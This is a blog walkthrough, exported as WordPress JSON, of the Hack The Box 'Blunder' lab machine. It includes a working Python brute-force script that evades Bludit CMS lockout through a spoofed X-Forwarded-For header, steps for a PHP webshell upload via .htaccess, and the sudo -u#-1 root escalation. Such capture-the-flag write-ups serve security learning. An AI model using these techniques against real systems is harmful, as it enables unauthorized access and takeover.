{"id":277,"date":"2020-06-08T16:18:50","date_gmt":"2020-06-08T16:18:50","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=277"},"modified":"2020-10-18T06:14:31","modified_gmt":"2020-10-18T06:14:31","slug":"blunder-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/blunder-hackthebox-walkthrough\/","title":{"rendered":"Blunder: Hackthebox Walkthrough"},"content":{"rendered":"\n

Hey all! In this blog post, we\u2019ll be walking through blunder from hackthebox. Blunder is an easy level linux machine.  <\/p>\n\n\n\n

Summary<\/h2>\n\n\n\n

The initial foothold on the box requires a bit of enumeration to find out the correct user who can login into CMS:- bludit. There is the file upload vulnerability on the cms that gets the initial shell on the box. With enumeration, we need to find the password for the user on he box. Privilege escalation to root is pretty simple as we just need to identify the privileges granted to the user.<\/p>\n\n\n\n

With all that said, lets get started.<\/p>\n\n\n\n

Starting with the namp scan, I found port 80 to be open, whereas port 21 (ftp) was filtered. So its of no use.<\/p>\n\n\n\n

# nmap -sC -sV -oA blunder.nmap 10.10.10.191<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Next, I went to http:\/\/10.10.10.191<\/a> . A page landed.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Cool! Scrolling through the contents, I found out that is is kind of a blog page.<\/p>\n\n\n\n
About page was much like a riddle<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I spawned a gobuster scan on the host<\/p>\n\n\n\n
# gobuster dir --url  http:\/\/10.10.10.191   -t 50  -w \/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt -o gobuster.out<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Looking at the output, \/admin seemed interesting, so i jumped right into the http:\/\/10.10.10.191\/admin<\/a> and there was a login page<\/strong>.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The title mentioned bludit so i googled for it. It turned out to be the CMS. I searched for any exploits for the cms<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
These 2 were authenticated attacks, so not of any use now. Googling for bludit exploits took me here (https:\/\/github.com\/bludit\/bludit\/pull\/1090<\/a>) . It was basically bruteforcing the password for the user. The version affected was 3.9.2 so I tried to check the version of bludit installed on the box.<\/p>\n\n\n\n
On google.com search bludit github and the directory structure will open. From there, one can understand what all directories might be present for the cms. <\/p>\n\n\n\n
Its a good practice to seach for the github repo of any cms to check for useful directories and files.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I found the version of bludit inside \/bl-themes\/blogx\/metadata.json<\/strong>. And its was 3.9.2<\/strong><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
But the prob now is, we dont know the user. Writing admin would be a lame guess. Maybe, I was missing out some directories\/files that were not visible in the gobuster out.<\/p>\n\n\n\n
So this time, i ran gobuster with some extension flags (  php and txt ) and used seclists-common.txt <\/strong>as the wordlist.<\/p>\n\n\n\n
# gobuster dir --url  http:\/\/10.10.10.191\/ -t 50  -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt -o gobuster_dir1.out -x php,txt -s 200,204,401,403<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
When i listed the contents of todo.txt, it unveiled the user to be fergus<\/strong>.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I modified the script to add the wordlist of my choice<\/p>\n\n\n\n
!\/usr\/bin\/env python3\nimport re\nimport requests\n\nhost = 'http:\/\/10.10.10.191'\nlogin_url = host + '\/admin\/login.php'\nusername = 'fergus'\nwordlist = []\ndef file_read(fname):\n    \twith open(fname) as f:\n            \t#Content_list is the list that contains the read lines.\t \n            \tfor line in f:\n                    \twordlist.append(line.strip())   \n            \tprint(wordlist)\nfile_read('password_index.txt')\n# Add the correct password to the end of the list\nwordlist.append('adminadmin')\n\nfor password in wordlist:\n\tsession = requests.Session()\n\tlogin_page = session.get(login_url)\n\tcsrf_token = re.search('input.+?name=\"tokenCSRF\".+?value=\"(.+?)\"', login_page.text).group(1)\n\n\tprint('[*] Trying: {p}'.format(p = password))\n\n\theaders = {\n    \t'X-Forwarded-For': password,\n    \t'User-Agent': 'Mozilla\/5.0 (X11; Linux x86_64; rv:76.0) Gecko\/20100101 Firefox\/76.0',\n    \t'Referer': login_url\n\t}\n\n\tdata = {\n    \t'tokenCSRF': csrf_token,\n    \t'username': username,\n    \t'password': password,\n    \t'save': ''\n\t}\n\n\tlogin_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)\n\n\tif 'location' in login_result.headers:\n    \tif '\/admin\/dashboard' in login_result.headers['location']:\n        \tprint()\n        \tprint('SUCCESS: Password found!')\n        \tprint('Use {u}:{p} to login.'.format(u = username, p = password))\n        \tprint()\n        \tbreak\n<\/code><\/pre>\n\n\n\n
I used a lots of wordlist to brute-force the password, but none of them worked. Finally i created a wordlist out of content of the website. It can be done using cewl.<\/p>\n\n\n\n
# cewl http:\/\/10.10.10.191\/ -w password_index.txt
\n# python exploit.py<\/pre>\n\n\n\n
<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
And it worked revealing the password to be RolandDeschain<\/strong>.<\/p>\n\n\n\n
I quickly logged in to the CMS with the credentials.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
There was a section to add new-content.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
This is the place where we found the image upload vulnerability in the searchsploit. The issue is describe here (https:\/\/github.com\/bludit\/bludit\/issues\/1081<\/a>) <\/p>\n\n\n\n
The contents of the image is changed to php webshell. GIF89a <\/strong>at the bebeginning will dupe the server to believe it to be a gif file. Also, the exploit uses tempering the uuid  parameter to ..\/..\/tmp\/temp<\/strong>. So our malicious file will be stored in \/tmp\/temp <\/strong>directory. <\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Also, a crafted .htaccess <\/strong>file has to be uploaded. Using AddType<\/a> in your .htaccess file, one can add many other extensions from which PHP can be ran. In a nutshell, we\u2019re using .htaccess so that the image.jpg could be converted to image.php ( the file will now execute commands). <\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Now that the .htaccess is uploaded, shell.php can be accessed in http:\/\/10.10.10.191\/bl-content\/tmp\/shell.php<\/a> .(even if the extension of shell is .jpg, the exploit is gonna work.) I grabbed a simple one-liner reverse shell from pentest monkey<\/a> and spawned a listener on the local box. <\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
And got the initial foothold.<\/p>\n\n\n\n
Getting the user.txt<\/p>\n\n\n\n
I started to enumerate with linpeas.sh but found nothing interesting. There were 2 users on the box hugo <\/strong>and shaun<\/strong> with hugo having the user.txt.<\/p>\n\n\n\n
Then i started manual enumeration and came across \/var\/www. There were 2 versions of bludit present. On digging, I found out the sha1 password hash<\/strong> for hugo. <\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I went to an online decrypter https:\/\/md5decrypt.net\/en\/<\/a> to crack the hash.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Since now i had the password to be Password120<\/strong>, I did su – hogo<\/strong> on the box.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I am hugo <\/strong>now. The user.txt can be grabbed now.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Privilege escalation to root!!!<\/h2>\n\n\n\n
Upon initial enumeration, I found that sudo is present on the box. So I quickly ran sudo -l<\/strong><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Hugo can run \/bin\/bash but not as root! I search the exact string on google and landed up on an exploit https:\/\/www.exploit-db.com\/exploits\/47502<\/a><\/p>\n\n\n\n
Exploit description<\/h3>\n\n\n\n
Sudo doesn’t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
 -u#-1 returns as 0 which is root’s id
 and \/bin\/bash is executed with root permission<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Got root!!<\/h4>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Thats all for the blog post!! Thanks for reading! For more such content visit here<\/a>
\nSee you in the next post. Until then, happy hunting!!<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Hey all! In this blog post, we\u2019ll be walking through blunder from hackthebox. Blunder is an easy level linux machine.   Summary The initial foothold on the box requires a bit of enumeration to find out the correct user who can login into CMS:- bludit. There is the file upload vulnerability on the cms that […]<\/p>\n","protected":false},"author":1,"featured_media":280,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,141],"tags":[135,136,137,138,54,134,71,140,139,41,98],"class_list":["post-277","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-linux","tag-bludit","tag-cms","tag-enumeration","tag-gobuster","tag-htb","tag-htb-blunder","tag-linux","tag-pentesting","tag-readteam","tag-shell-upload","tag-sudo","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/277"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=277"}],"version-history":[{"count":5,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/277\/revisions"}],"predecessor-version":[{"id":523,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/277\/revisions\/523"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/280"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}